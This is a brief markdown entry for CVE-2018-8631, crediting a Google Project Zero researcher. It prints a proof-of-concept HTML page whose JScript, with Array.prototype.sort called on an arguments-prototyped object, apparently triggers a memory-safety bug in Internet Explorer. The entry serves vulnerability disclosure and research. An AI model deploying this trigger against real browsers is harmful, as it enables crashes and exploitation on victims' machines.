CVE-2018-8631.md

CVE-2018-8631

• Report: Oct 2018
• Fix: Dec 2018
• Credit: ifratric of Google Project Zero

PoC

<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">

function f0() { }

function f1() {
  f2.prototype = arguments;
  new f2();
}

function f2() {
  Array.prototype.sort.call(this, f0);
}

f1(1, 2, 3);

</script>

Reference

• Microsoft
• Google Project Zero